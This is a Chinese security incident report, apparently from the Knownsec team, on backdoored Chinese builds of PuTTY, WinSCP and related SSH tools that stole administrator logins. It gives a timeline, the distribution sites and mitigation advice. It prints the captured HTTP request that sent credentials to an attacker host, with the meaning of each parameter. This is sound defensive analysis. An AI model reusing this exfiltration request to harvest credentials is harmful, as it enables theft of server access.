2012年02月01日 17:45
感謝lszm的投遞
近幾日,中文版putty等SSH遠程管理工具被曝出存在後門,該後門會自動 竊取管理員所輸入的SSH用戶名與口令,並將其發送至指定服務器上。知道創宇安全研究小組在第一時間獲取該消息後,對此次事件進行了跟蹤和分析。根據分 析,此次事件涉及到來自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站點的中文版putty、 WinSCP、SSHSecure和psftp等軟件,而這些軟件的英文版本不受影響。
1.時間線
1月25日:新浪微博有網友發佈消息稱putty和winscp中裝有後門程序,但該條微博並未提及後門程序的類型及其技術細節,而且消息也未被過多的人所重視,目前無法確定該條微博是否與此次事件有關聯:
1月30日下午16點左右:互聯網上再度出現關於中文版putty等SSH管理軟件被裝有後門的消息,並且此消息對後門的行爲特徵進行了簡要的描述 —— 該程序會導致root密碼丟失,但發佈者仍未披露具體的技術細節:
以上微博的短URL所對應的文章截圖如下:
1月31日:經過一晚的醞釀,putty事件開始在互聯網上廣泛傳播,微博、論壇等信息發佈平臺上開始大量出現putty後門事件的消息,同時,很多技術人員也開始對含有後門的putty等SSH管理軟件進行技術分析,並陸續發佈其中的技術細節。
2.事件分析
2.1問題軟件源頭
知道創宇安全研究團隊在獲取信息後,第一時間對putty等軟件進行了跟蹤分析。通過分析發現,來自以下幾個站點的中文版putty、WinSCP、SSHSecure和psftp等軟件都可能存在後門程序:
http://www.putty.org.cn
http://www.putty.ws
http://www.winscp.cc
http://www.sshsecure.com
2.2行爲分析
2.2.1網絡行爲分析
使用帶有後門程序的中文版putty等SSH管理軟件連接服務器時,程序會自動記錄登錄時的用戶名、密碼和服務器IP地址等信息,並會以HTTP的方式將這些信息發送到指定的服務器上,以下是在分析過程中抓取到的原始HTTP數據:
GET /yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Host: l.ip-163.com:88
Pragma: no-cache
從以上數據可以獲得以下信息:
- 敏感信息通過HTTP GET的方式發送到服務器l.ip-163.com上(經測試,該域名與putty.org.cn位於同一IP地址上)
- 用於收集密碼的程序地址爲http:// l.ip-163.com:88/yj33/js2.asp
- 敏感信息以GET參數的方式發送到服務器上,相關參數爲:
act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY
每個字段的作用如下:
- act爲執行的動作,參數add用於添加信息,經測試,也可使用del來刪除信息
- user爲SSH服務器的IP地址,此處爲50.23.79.188
- pwd爲連接服務器時的登錄用戶名,此處爲abc
- ll1爲登錄密碼,此處爲pass
- ll2爲目標服務器的SSH端口,此處爲22(即,默認端口)
- ll3則爲客戶端類型,此處爲PuTTY
2.2.2服務器本地文件分析
知道創宇安全研究團隊藉助文件完整性校驗的方式,對服務器初始安全狀態下的 /etc、/lib、/usr、/bin等敏感目錄進行了完整性備份,並在putty連接測試後對這些目錄的文件變更、丟失和添加等情況進行了校驗,校驗 結果顯示,中文版putty並未對服務器自動安裝後門程序。
網絡上部分消息稱,有些使用中文版putty進行過遠程管理的服務器上出現惡意代碼和文件,可能是由於惡意用戶獲取了putty所收集的密碼後人爲植入所致。
2.3事件後續
截止至2月1日,在本次事件中所涉及的以下域名均已不能訪問:
http://www.putty.org.cn
http://putty.ws
http://www.winscp.cc
http://www.sshsecure.com
http://l.ip-163.com:88
但是,在1月31日晚,網絡上傳出“l.ip-163.com被黑”的消息並配有一張“受害者列表”的截圖:
而就在此消息發佈不久之後,互聯網上便出現了完整的受害者列表供所有用戶瀏覽和下載,根據這份來自互聯網列表的顯示,不但有衆多政府網站位列其中,IBM、Oracle、HP等大廠商的服務器也出現在列表內。
3.安全建議
若您使用過中文版的putty、WinSCP、SSHSecure和psftp等軟件,但暫時又不能對服務器進行下線處理,可採取以下臨時解決方案來處理:
- 使用chkrootkit或rootkit hunter對服務器進行掃描,檢查是否存在已知後門
- 查看網絡是否有可疑外聯,並加強對可疑外聯的監控
- 在網絡層建立端口訪問控制策略,阻止除正常業務外的一切非業務、非管理端口
- 更換SSH登錄密碼,建議登錄時使用證書加密碼的組合方式進行身份驗證
- 登錄SSH時,不要直接使用root用戶,先使用普通用戶登錄後,再su至root
- 服務器端通過TCP Wrapper或iptables等軟件,限制IP訪問,僅允許特定IP地址對服務器的SSH進行連接和管理
- 如需使用putty、WinSCP等軟件,可訪問其官方站點下載:
http://winscp.net/eng/docs/lang:chs